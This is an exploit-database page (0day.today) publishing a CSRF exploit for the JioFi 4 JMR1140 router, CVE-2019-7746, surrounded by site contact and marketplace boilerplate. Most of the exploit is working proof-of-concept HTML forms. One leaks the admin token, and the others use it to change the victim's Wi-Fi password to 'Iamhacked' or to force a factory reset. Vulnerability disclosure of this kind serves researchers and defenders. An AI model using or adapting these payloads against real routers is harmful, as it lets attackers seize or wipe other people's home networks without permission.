0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - CSRF (Admin Token Disclosure) Vulnerability

Author

Ronnie T Baby

Risk

[

Security Risk Low

]

0day-ID

Category

Date add

CVE

Platform

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router	
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746

Description:

JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a  /cgi-bin/qcmap_auth type=getuser request and then reading the token  field. This token value can then be used to change the Wi-Fi password or perform a factory reset.

POC-

The exploit requires two csrf requests to be sent to the victim(logged to  the web interface) connected to the Jiofi router.

1. First get admin tokens 

<html>
    <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
      <input type="hidden" name="type" value="getuser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


  Example response-

{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}

Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" />
      <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
      <input type="hidden" name="tx&#95;power" value="HIGH" />
      <input type="hidden" name="wmm" value="Enable" />
      <input type="hidden" name="wps&#95;enable" value="PushButton" />
      <input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
      <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
      <input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
      <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
      <input type="hidden" name="channel&#95;mode" value="automatic" />
      <input type="hidden" name="channel&#95;selection" value="11" />
      <input type="hidden" name="sleep&#95;mode" value="Enable" />
      <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
      <input type="hidden" name="ssid&#95;broadcast" value="Enable" />
      <input type="hidden" name="enable&#95;wifi" value="Enable" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Wifi Password changed to Iamhacked

Choice B) Perform Remote Factory Reset

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="type" value="FRST&#95;REAL" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The router reboots to default settings.


Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

#  0day.today [2024-09-28]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - CSRF (Admin Token Disclosure) Vulnerability

Report Error

Report Error